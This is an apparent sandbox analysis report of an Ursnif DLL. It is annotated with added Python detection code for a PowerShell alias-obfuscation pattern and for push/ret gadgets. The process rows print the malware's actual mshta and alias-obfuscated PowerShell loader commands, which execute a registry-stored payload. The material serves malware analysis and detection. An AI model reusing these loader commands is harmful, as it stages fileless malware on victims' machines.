            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ltid='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ltid).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
            Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown
            Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown
            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Bn49='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bn49).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown
            Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:17422 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:82956 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:17430 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:82992 /prefetch:2
            Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Text.Encoding]::ASCII.GetString((egwasf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.cmdline
            Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name viccxg -value gp; new-alias -name qooxkryog -value iex; qooxkryog ([System.Text.Encoding]::ASCII.GetString((viccxg "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.cmdline
            Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([System.Text.Encoding]::ASCII.GetString((einkftwfr "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
            Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([System.Text.Encoding]::ASCII.GetString((einkftwfr "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mrf10rqm\mrf10rqm.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vgn3eu5f\vgn3eu5f.cmdline
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4702.tmp" "c:\Users\user\AppData\Local\Temp\eutk2hxp\CSC3C520F3552234BD5981E8C2C19975E5B.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES49B1.tmp" "c:\Users\user\AppData\Local\Temp\5nzflxas\CSCCA0D8D115C84DA1A0293F6BF85846.TMP"
            Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4D3C.tmp" "c:\Users\user\AppData\Local\Temp\fyriofhk\CSC7F089C7BD9A5426483691E56FD9DB0F7.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES522D.tmp" "c:\Users\user\AppData\Local\Temp\yycrjy0w\CSCDAC2BC21A294475B86B2FDF784B11415.TMP"
            Source: C:\Windows\System32\control.exeProcess created: unknown unknown
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES67D8.tmp" "c:\Users\user\AppData\Local\Temp\babtdr3v\CSC990A060DA8974A64BF3BB68C9993246.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: unknown unknown
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: unknown unknown
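The mshta -> powershell.exe -> csc.exe rows above are the part of this chain worth matching in process-creation telemetry. The PowerShell command line renames two built-in aliases (gp is Get-ItemProperty, iex is Invoke-Expression) to random names, reads a binary value named UrlsReturn from the per-victim key under HKCU\Software\AppDataLow\Software\Microsoft\<GUID>, decodes it as ASCII and executes it; the csc.exe children compiling a .cmdline file from %TEMP% are what Add-Type produces when the decoded script compiles C#. The following detection logic is an added example, not code from Joe Sandbox or from the Sigma rules it references; the process-creation events it scans are constructed from the rows above (plus one benign control) and are not real telemetry, and the finding labels are this example's own.

```python
"""Detection logic for the mshta -> PowerShell -> csc.exe chain in this report.

The process-creation events below (parent image, child command line) are
constructed from the sandbox rows; they are not real telemetry.
"""
import re

# new-alias/set-alias (and short forms nal/sal), -name/-value as switches or positional
PS_ALIAS_RE = re.compile(
    r"\b(?:new-alias|set-alias|nal|sal)\s+(?:-name\s+)?([\w-]+)\s+(?:-value\s+)?([\w-]+)",
    re.IGNORECASE,
)
# Cmdlets (and their built-in aliases) that matter once custom aliases are resolved
DANGEROUS = {
    "iex": "Invoke-Expression", "invoke-expression": "Invoke-Expression",
    "gp": "Get-ItemProperty", "get-itemproperty": "Get-ItemProperty",
}
# Ursnif's per-victim key: HKCU\Software\AppDataLow\Software\Microsoft\<GUID>
APPDATALOW_RE = re.compile(
    r"HKCU:\\?Software\\AppDataLow\\Software\\Microsoft\\[0-9A-Fa-f-]{36}", re.IGNORECASE
)
# csc.exe response file under %TEMP%, as produced by Add-Type (matched on lower-cased text)
ADD_TYPE_RE = re.compile(r'@"?[^"]*\\appdata\\local\\temp\\[^"]*\.cmdline')
# rundll32 invoking an export by ordinal ("...dll",#1)
ORDINAL_RE = re.compile(r"rundll32(?:\.exe)?\b.*,\s*#\d+")


def resolve_aliases(cmdline):
    """Return (alias -> real target, command line with the aliases substituted)."""
    aliases = {m.group(1).lower(): m.group(2).lower() for m in PS_ALIAS_RE.finditer(cmdline)}
    resolved = {}
    for name, target in aliases.items():
        hops = 0
        while target in aliases and hops < 8:   # follow alias-to-alias chains, bounded
            target, hops = aliases[target], hops + 1
        resolved[name] = target
    plain = cmdline
    for name, target in resolved.items():
        plain = re.sub(r"(?<![\w-])" + re.escape(name) + r"(?![\w-])", target, plain, flags=re.IGNORECASE)
    return resolved, plain


def analyze_powershell(cmdline):
    """Findings for one PowerShell command line, after seeing through its aliases."""
    aliases, plain = resolve_aliases(cmdline)
    lowered = plain.lower()
    findings = []
    hidden = sorted(t for t in set(aliases.values()) if t in DANGEROUS)
    if hidden:
        findings.append("alias-obfuscated cmdlets: " + ", ".join(DANGEROUS[t] for t in hidden))
    m = APPDATALOW_RE.search(plain)
    if m:
        findings.append("reads registry-stored stage: " + m.group(0))
    if re.search(r"\biex\b|invoke-expression", lowered) and "getstring" in lowered:
        findings.append("decodes bytes to text and executes them with Invoke-Expression")
    return findings, plain


def classify_event(parent, cmdline):
    """Detections for one process-creation event (parent image path, child command line)."""
    p, c = parent.lower(), cmdline.lower()
    hits = []
    if p.endswith("\\mshta.exe") and "powershell" in c:
        hits.append("mshta spawned PowerShell")
    if p.endswith("\\powershell.exe") and "\\csc.exe" in c and ADD_TYPE_RE.search(c):
        hits.append("PowerShell compiling C# in %TEMP% (Add-Type)")
    if ORDINAL_RE.search(c):
        hits.append("rundll32 calling a DLL export by ordinal")
    if "powershell" in c:
        hits.extend(analyze_powershell(cmdline)[0])
    return hits


# Constructed events: three taken from the rows in this report, one benign control.
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\mshta.exe",
     r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name viccxg -value gp; new-alias -name qooxkryog -value iex; qooxkryog ([System.Text.Encoding]::ASCII.GetString((viccxg "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))'),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.cmdline'),
    (r"C:\Windows\SysWOW64\cmd.exe",
     r'rundll32.exe "C:\Users\user\Desktop\status.dll",#1'),
    (r"C:\Windows\explorer.exe",   # benign: an admin reading a key by hand
     r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'),
]


def run_sample():
    """Classify the constructed events; one list of hits per event."""
    return [classify_event(parent, cmd) for parent, cmd in SAMPLE_EVENTS]


if __name__ == "__main__":
    for (parent, cmd), hits in zip(SAMPLE_EVENTS, run_sample()):
        print(parent.rsplit("\\", 1)[-1], "->", hits or "clean")
```

Resolving the aliases before matching is the point: a rule that only looks for the literal string iex misses this sample, while one that keys on new-alias -value iex plus a read of the AppDataLow key survives the random alias names, which change per run (compare the viccxg/qooxkryog and einkftwfr/ulhulxq rows above).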
            Source: C:\Windows\System32\loaddll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
            Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
            Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Temp\~DFABD2BAAC7D7BDC70.TMP
            Source: classification engine | Classification label: mal100.troj.evad.winDLL@80/93@8/2
            Source: C:\Windows\System32\loaddll32.exe | File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll (4 occurrences)
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll (21 occurrences)
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_017D2AB4 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\status.dll",#1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\{F408F8B3-C39F-46C2-ED68-A7DA711CCBAE}
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6324:120:WilError_01
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\{A446E4F3-B3E1-76BB-5D18-970AE1CCBBDE}
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6416:120:WilError_01
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\{D456EBDA-23D4-26AB-4D48-07BAD1FC2B8E}
            Source: C:\Windows\System32\loaddll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\{ECD50131-5BD8-FE31-45E0-BF1249146366}
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7160:120:WilError_01
            Source: C:\Windows\SysWOW64\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\{0C9EE140-FBC1-1ECF-E500-5F32E9340386}
            Source: C:\Windows\SysWOW64\regsvr32.exe | Mutant created: \Sessions\1\BaseNamedObjects\{D47D1D27-23CF-266A-4D48-07BAD1FC2B8E}
            Source: C:\Windows\SysWOW64\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\{D8EBAF0D-57FD-CA7A-A18C-7B9E6580DFB2}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\{700550A9-0FDA-2200-19A4-B3765D18970A}
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5960:120:WilError_01
            Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
            Source: status.dll | Static file information: File size 1235456 > 1048576
            Source: status.dll | Static PE information: Raw size of .data is bigger than: 0x100000 < 0x121200
            Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000001.00000003.407600031.0000000005070000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.432953884.0000000005E00000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.432954394.00000000064C0000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.402949570.0000000005AD0000.00000004.00000001.sdmp
            Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000001.00000003.407600031.0000000005070000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.432953884.0000000005E00000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.432954394.00000000064C0000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.402949570.0000000005AD0000.00000004.00000001.sdmp
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_017D7DE0 push ecx; ret
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_017D81CB push ecx; ret
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_00FE06F5 push dword ptr [ebp-00000284h]; ret
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_00FE0AB8 push edx; ret
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_00FE0880 push dword ptr [ebp-00000284h]; ret
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_00FE0A64 push edx; ret
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_00FE0A64 push dword ptr [esp+10h]; ret
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_00FE0BFC push dword ptr [esp+0Ch]; ret
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_00FE0BFC push dword ptr [esp+10h]; ret
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_00FE05DF push dword ptr [ebp-00000284h]; ret
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_03B23713 push ecx; ret
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_02D481CB push ecx; ret
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_02D47DE0 push ecx; ret
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_00960880 push dword ptr [ebp-00000284h]; ret
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_00960AB8 push edx; ret
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_009606F5 push dword ptr [ebp-00000284h]; ret
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_00960A64 push edx; ret
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_00960A64 push dword ptr [esp+10h]; ret
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_009605DF push dword ptr [ebp-00000284h]; ret
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_00960BFC push dword ptr [esp+0Ch]; ret
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_00960BFC push dword ptr [esp+10h]; ret
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04903713 push ecx; ret
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_049031E0 push ecx; ret
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04AA7DE0 push ecx; ret
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04AA81CB push ecx; ret
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_031C05DF push dword ptr [ebp-00000284h]; ret
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_031C0BFC push dword ptr [esp+0Ch]; ret
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_031C0BFC push dword ptr [esp+10h]; ret
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_031C0A64 push edx; ret
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_031C0A64 push dword ptr [esp+10h]; ret
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_031C0880 push dword ptr [ebp-00000284h]; ret
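The push X; ret rows above are the evidence behind the "Uses code obfuscation techniques (call, push, ret)" signature: pushing a target address (or a register or stack slot holding one) and then executing ret is a jump that a linear-sweep disassembler does not follow, and the same three encodings recur in the loaddll32, regsvr32 and rundll32 copies of the injected code. The scanner below is an added example, not Joe Sandbox's detection code; it locates those three encodings in a byte buffer that is constructed here (the bytes and the base address are arbitrary, not taken from status.dll) and prints them in the notation the rows use. It reports the address of each gadget itself, whereas the rows above report the address of the enclosing function, so the same function can appear twice there with two different gadgets.

```python
"""Scan a 32-bit code buffer for push/ret control-flow obfuscation.

The byte buffer below is constructed for this example; bytes and base are arbitrary.
"""
import struct

REGS32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]


def _fmt_disp(value, width):
    """Render a signed displacement the way the sandbox rows do: -00000284h, +10h."""
    return f"{'-' if value < 0 else '+'}{abs(value):0{width}X}h"


def find_push_ret(code, base=0):
    """Return (address, text) for every push-then-ret sequence in `code`.

    Encodings covered (the three forms seen in the rows above):
      push r32 ; ret                    -> 50+r  C3
      push dword ptr [ebp+disp32] ; ret -> FF B5 <disp32> C3
      push dword ptr [esp+disp8]  ; ret -> FF 74 24 <disp8> C3
    """
    hits = []
    n = len(code)
    for i in range(n):
        b = code[i]
        if 0x50 <= b <= 0x57 and i + 1 < n and code[i + 1] == 0xC3:
            hits.append((base + i, f"push {REGS32[b - 0x50]}; ret"))
        elif b == 0xFF and i + 6 < n and code[i + 1] == 0xB5 and code[i + 6] == 0xC3:
            disp = struct.unpack_from("<i", code, i + 2)[0]          # signed disp32
            hits.append((base + i, f"push dword ptr [ebp{_fmt_disp(disp, 8)}]; ret"))
        elif b == 0xFF and i + 4 < n and code[i + 1] == 0x74 and code[i + 2] == 0x24 and code[i + 4] == 0xC3:
            disp = struct.unpack_from("<b", code, i + 3)[0]          # signed disp8
            hits.append((base + i, f"push dword ptr [esp{_fmt_disp(disp, 2)}]; ret"))
    return hits


# Constructed buffer: ordinary instructions interleaved with the three gadget forms.
SAMPLE_CODE = bytes([
    0x55, 0x8B, 0xEC,                          # push ebp; mov ebp, esp (prologue, no ret follows)
    0x51, 0xC3,                                # push ecx; ret
    0x90, 0x90,                                # nop; nop
    0xFF, 0xB5, 0x7C, 0xFD, 0xFF, 0xFF, 0xC3,  # push dword ptr [ebp-284h]; ret
    0x33, 0xC0,                                # xor eax, eax
    0xFF, 0x74, 0x24, 0x10, 0xC3,              # push dword ptr [esp+10h]; ret
    0xC3,                                      # a plain ret with no push in front of it
])
SAMPLE_BASE = 0x00401000   # arbitrary load address for the constructed buffer


def scan_sample():
    """Run the scanner over the constructed buffer."""
    return find_push_ret(SAMPLE_CODE, SAMPLE_BASE)


if __name__ == "__main__":
    for addr, text in scan_sample():
        print(f"{addr:08X} {text}")
```

A scan like this is a triage aid, not proof on its own: a lone push reg; ret is legitimate in some hand-written runtime code, so the useful signal is the density of such sequences in a region that was written into another process, which is the combination the sandbox flags here.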
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_03B039B2 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey,
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\status.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.cmdline (2 occurrences)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.cmdline (2 occurrences)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.cmdline (2 occurrences)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.cmdline (2 occurrences)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.cmdline (2 occurrences)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.cmdline (2 occurrences)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mrf10rqm\mrf10rqm.cmdline (2 occurrences)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vgn3eu5f\vgn3eu5f.cmdline (2 occurrences)
            Source: initial sample | Static PE information: section name: .text entropy: 6.95280203957
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.dll

            Hooking and other Techniques for Hiding and Protection:

            Yara detected Ursnif
            Source: Yara match | File source: 00000006.00000003.330162595.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.392202470.0000000005AB8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.411738935.00000000064A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.338066734.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.349294200.000000000536C000.00000004.00000040.sdmp, type: MEMORY
